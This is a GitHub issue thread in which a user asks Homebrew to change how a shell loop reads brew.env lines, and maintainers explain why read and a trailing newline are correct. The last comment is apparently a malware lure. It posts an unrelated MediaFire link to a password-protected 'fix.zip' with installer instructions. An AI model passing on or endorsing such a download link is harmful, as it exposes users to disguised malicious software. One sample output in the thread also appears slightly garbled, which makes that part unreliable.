### ISSUE TITLE
Suggest to change the way to read file in export_homebrew_env_file

### ISSUE THREAD

**Issue by xycabcd** [Homebrew/brew#18182]
### Verification

- [x] This issue's title and/or description do not reference a single formula e.g. `brew install wget`. If they do, open an issue at https://github.com/Homebrew/homebrew-core/issues/new/choose instead.

### Provide a detailed description of the proposed feature

Now, it use read like this:
```shell
while read line
  do
    export "${line?}"
  done < file
```
But it won't read the last line the file. So users has to add a empty line on the end or lost a line of configuration.

Instead of while, cat won't lost any line. Like this:
```shell
for line in `cat file`
do
     echo $line
done
```

### What is the motivation for the feature?

Won't lost the last line of configuration file.

### How will the feature be relevant to at least 90% of Homebrew users?

they won't lost their configuration and feel confused and never get the answer.

### What alternatives to the feature have been considered?

```shell
cat file | awk'{print $0}' | while read -r line ...
```

or

```shell
while read line || [[ -n ${line} ]]

**Comment by carlocab** [comment]
`read` is a shell builtin while `cat` is not, so using `read` has better portability and performance.

I also can't reproduce the issue you're having with `read` but not with `cat`:
```
❯ /bin/bash -c 'cat test'
foo
bar
baz
❯ /bin/bash -c 'while read line; do echo $line; done <test'
foo
bar
baz
```

**Comment by ZhongRuoyu** [comment]
Please read https://stackoverflow.com/questions/729692/why-should-text-files-end-with-a-newline to see why text files must end with a new line (at least in UNIX land).

**Comment by carlocab** [comment]
I'd rather you just terminate your `brew.env` file a newline instead, as suggested above:

> Please read [stackoverflow.com/questions/729692/why-should-text-files-end-with-a-newline](https://stackoverflow.com/questions/729692/why-should-text-files-end-with-a-newline) to see why text files must end with a new line (at least in UNIX land).

Also, for future reference, we can't use
```
for line in `cat file`
```
because `for` will split the output of `cat file` on words and not lines. For example:
```
❯ /bin/bash -c 'cat test'
foo
bar qux
baz
❯ /bin/bash -c 'for line in `cat test`; do echo $line; done'
foo
bar
qux
ba
```

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
